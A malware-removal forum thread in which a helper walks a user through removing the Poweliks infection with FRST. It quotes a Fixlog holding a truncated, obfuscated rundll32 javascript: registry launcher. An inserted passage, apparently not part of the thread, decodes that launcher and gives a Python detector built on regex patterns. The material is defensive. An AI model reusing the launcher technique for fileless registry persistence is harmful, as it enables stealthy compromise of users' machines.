
Ok, so. 

 

My computer started slowing down and I checked and saw multiple instances of dllhost.exe bogging down my CPU usage, taking almost 100%. I ran all my anti-malware programs and removed multiple Trojans and Worms. I ran combofix (don't worry, I know what I'm doing) but it didn't seem to solve the issue. I ran FRST and have all the logs. I am attaching them below.

 

Please help ASAP! 

FRST.txt

Addition.txt


How is the computer running???

It should be OK now.....Poweliks has been removed.

MrC

I didn't do anything? All you told me to do was run the fix in FRST.exe and then post the log. I did that, but how could that fix my PC? There are still multiple instances of dllhost.exe.

What should I do now? Perhaps you are confusing my post with the many others with the same issue that I see you are also helping out. Look up and read my log, then tell me what my next step should be. 

 

Thanks!


That's all that's needed to remove it.

Re-scan with FRST and make sure the Addition box is checked.

Post or attach the 2 logs FRST(64).txt and Addition.txt

MrC

 

Content of fixlist:

*****************

HKU\S-1-5-21-2225270536-3074668905-2890858297-1000\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters).

CustomCLSID: HKU\S-1-5-21-2225270536-3074668905-2890858297-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters).

*****************

"HKU\S-1-5-21-2225270536-3074668905-2890858297-1000\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32" => Key Deleted Successfully.

"HKU\S-1-5-21-2225270536-3074668905-2890858297-1000\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" => Key deleted successfully.

"HKU\S-1-5-21-2225270536-3074668905-2890858297-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" => Key not found.

==== End of Fixlog ====

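The Fixlog above is the whole story of this infection: Poweliks persists as a COM class whose LocalServer32 value is not a program path at all but `rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("...")`, so the payload lives in the registry and gets run by whatever process instantiates that CLSID, which is why the only visible symptom is dllhost.exe (the COM surrogate) eating CPU. The `eval()` argument shown in the log is obfuscated by adding one to every character code; the visible fragment `epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds` decodes to `document.write('<script language=jscr`. The following Python is an added example, not part of the thread or of FRST: it scans FRST-style `CustomCLSID:` lines for this pattern and decodes the visible part of the payload. The sample log is constructed from the entry quoted in the thread (with FRST's truncation note dropped) plus a made-up benign registration for contrast; the line format and the shift-by-one decoding are assumptions checked only against the data visible on this page.

```python
"""
Flag Poweliks-style fileless persistence in FRST "CustomCLSID:" log lines.

Added example for the thread above; not part of the original posts or of FRST.
Assumptions: FRST prints such entries as
    CustomCLSID: <key>\localserver32 -> <value data>
and the eval() argument is obfuscated by adding 1 to each character code.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample: the flagged entry quoted in the thread (tail cut where
# the log truncates it) plus one hypothetical, benign COM server registration.
SAMPLE_LOG = r"""
CustomCLSID: HKU\S-1-5-21-2225270536-3074668905-2890858297-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds
CustomCLSID: HKU\S-1-5-21-2225270536-3074668905-2890858297-1000_Classes\CLSID\{00000000-0000-0000-0000-000000000001}\localserver32 -> C:\Program Files\Example\example.exe /automation
"""

CLSID_LINE = re.compile(
    r"^CustomCLSID:\s+(?P<key>.+?\\localserver32)\s+->\s+(?P<data>.*)$", re.IGNORECASE
)
# A LocalServer32 that starts rundll32 with a javascript: URL is never a
# legitimate COM server; it is the Poweliks launcher.
RUNDLL_JS = re.compile(r"^rundll32(?:\.exe)?\s+javascript:", re.IGNORECASE)
EVAL_ARG = re.compile(r'eval\("(?P<arg>[^"]*)')


@dataclass
class Finding:
    key: str
    data: str
    reasons: List[str]
    decoded_prefix: str  # whatever part of the eval() argument was visible


def shift_decode(text: str, shift: int = 1) -> str:
    """Undo the +1 character-code obfuscation used in the eval() argument."""
    return "".join(chr(ord(c) - shift) for c in text)


def inspect_clsid_line(line: str) -> Optional[Finding]:
    """Return a Finding if this CustomCLSID line looks like Poweliks, else None."""
    m = CLSID_LINE.match(line.strip())
    if not m:
        return None
    key, data = m.group("key"), m.group("data")
    reasons = []
    if RUNDLL_JS.match(data):
        reasons.append("LocalServer32 runs rundll32.exe with a javascript: URL")
    if "RunHTMLApplication" in data:
        reasons.append("mshtml RunHTMLApplication used to execute script from the registry")
    if "eval(" in data:
        reasons.append("inline eval() of an obfuscated string")
    if not reasons:
        return None
    decoded = ""
    e = EVAL_ARG.search(data)
    if e:
        decoded = shift_decode(e.group("arg"))
    return Finding(key=key, data=data, reasons=reasons, decoded_prefix=decoded)


def scan_frst_log(text: str) -> List[Finding]:
    """Scan a whole FRST log (or Fixlog) for suspicious CustomCLSID entries."""
    return [f for f in (inspect_clsid_line(l) for l in text.splitlines()) if f]


if __name__ == "__main__":
    for f in scan_frst_log(SAMPLE_LOG):
        print("SUSPICIOUS:", f.key)
        for r in f.reasons:
            print("  -", r)
        print("  decoded eval() prefix:", f.decoded_prefix)
```

The decoder only recovers what the log shows; FRST truncates the value, so the real cleanup still needs the key deleted as the fixlist did. If you want to run the same check live rather than over a log, enumerate `HKU\<SID>_Classes\CLSID\*\LocalServer32` and apply `inspect_clsid_line` to each value formatted the same way.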

The Poweliks infection is gone.

dllhost.exe belongs to the Microsoft Windows operating system, and you will see it running.

The FRST log shows a couple of empty tasks and one file containing Alternate Data Streams.

Download the attached fixlist.txt to the same folder as FRST.exe/FRST64.exe.

Run FRST.exe/FRST64.exe and click Fix only once and wait

The tool will create a log (Fixlog.txt) in the folder, please post it to your reply.

MrC


Here it is. LMK if I need to do anything else...

 

Thanks!

Fixlog.txt


That's it, if there are no other problems......

Let's check your computer's security before you go, and we have a little cleanup to do also:

Download Security Check by screen317 from HERE or HERE.

  • Save it to your Desktop.
  • Double click SecurityCheck.exe and follow the onscreen instructions inside of the black box.
  • If you get Unsupported operating system. Aborting now, just reboot and try again.
  • A Notepad document should open automatically called checkup.txt.
  • Please Post the contents of that document.
  • Do Not Attach It!!!
MrC

 

Here is contents of log:

 

Results of screen317's Security Check version 0.99.89  
 Windows 7 Service Pack 1 x86 (UAC is disabled!)  
 Internet Explorer 11  
``````````````Antivirus/Firewall Check:`````````````` 
 Windows Firewall Enabled!  
Microsoft Security Essentials   
 Antivirus up to date!  
`````````Anti-malware/Other Utilities Check:````````` 
 SUPERAntiSpyware     
 Java 7 Update 60  
 Java version out of Date! 
 Adobe Reader XI  
 Google Chrome 38.0.2125.101  
 Google Chrome 38.0.2125.104  
````````Process Check: objlist.exe by Laurent````````  
 Microsoft Security Essentials MSMpEng.exe 
 Microsoft Security Essentials msseces.exe 
 Malwarebytes Anti-Malware mbamservice.exe  
 Malwarebytes Anti-Malware mbam.exe  
 Malwarebytes Anti-Malware mbamscheduler.exe   
`````````````````System Health check````````````````` 
 Total Fragmentation on Drive C: 2% 
````````````````````End of Log`````````````````````` 
 
 
I have to go now, so if there is anything else that needs to be done just leave me instructions and I'll do it in the morning. I can also post more logs in the morning if you need.

For now, thank you very much for all the help. I was expecting a long, drawn-out virus removal process, but I guess not. Hopefully it stays out. One more question: do you have any idea how it originally got onto my computer? I haven't visited any sketchy sites or used pirated software. Anyway, thanks again and enjoy your night!

I can't be sure how you got infected, various methods are used.

You can check the links below or Google Poweliks for more info:

http://www.pcworld.com/article/2461120/stealthy-malware-poweliks-resides-only-in-system-registry.html

http://www.sophos.com/en-us/support/knowledgebase/121370.aspx

===========================

Outdated programs on the system are vulnerable to malware.

Please update or uninstall them:

====================

Java 7 Update 60 <-----------please uninstall from your Programs and Features

Java version out of Date! <-------Download and install the latest version (Java™ 8 Update 25) from Here. Uncheck the box to install the Ask toolbar!!!, McAfee Security Scan Plus or any other free "stuff".

===================

A little clean up to do....

Please Uninstall ComboFix: (------->if you used it<-------)

Press the Windows logo key + R to bring up the "run box"

Copy and paste next command in the field:

ComboFix /uninstall

Make sure there's a space between Combofix and /


Then hit enter. (it may look like CF is re-installing but it's not)

This will uninstall ComboFix, delete its related folders and files, hide file extensions, hide the system/hidden files, clear the System Restore cache and create a new Restore Point.

(If that doesn't work.....you can simply rename ComboFix.exe to Uninstall.exe and double click it to complete the uninstall or download and run the uninstaller)

---------------------------------

Download Delfix from here and save it to your desktop. (you may already have this)

  • Ensure Remove disinfection tools is checked.
  • Click the Run button.
  • Reboot

Any other programs or logs that are still remaining, you can manually delete. (right click.....Delete)

i.e.: RogueKiller.exe, RKreport.txt, RK_Quarantine folder, C:\FRST folder, FRST-OlderVersion folder, MBAR folder, etc.... AdwCleaner > just run the program and click Uninstall.

Note:

If you used FRST and can't delete the quarantine folder:

Download the fixlist.txt to the same folder as FRST.exe.

Run FRST.exe and click Fix only once and wait

That will delete the quarantine folder created by FRST.

The rest you can manually delete.

-------------------------------

Any questions...please post back.

If you think I've helped you, please leave a comment > click on my avatar picture > click Profile Feed.

Take a look at My Preventive Maintenance to avoid being infected again.

Good Luck and Thanks for using the forum, MrC

Root Admin

Glad we could help. :)

If you need this topic reopened, please send a Private Message to any one of the moderating team members. Please include a link to this thread with your request. This applies only to the originator of this thread.

Other members who need assistance please start your own topic in a new thread. Thanks!
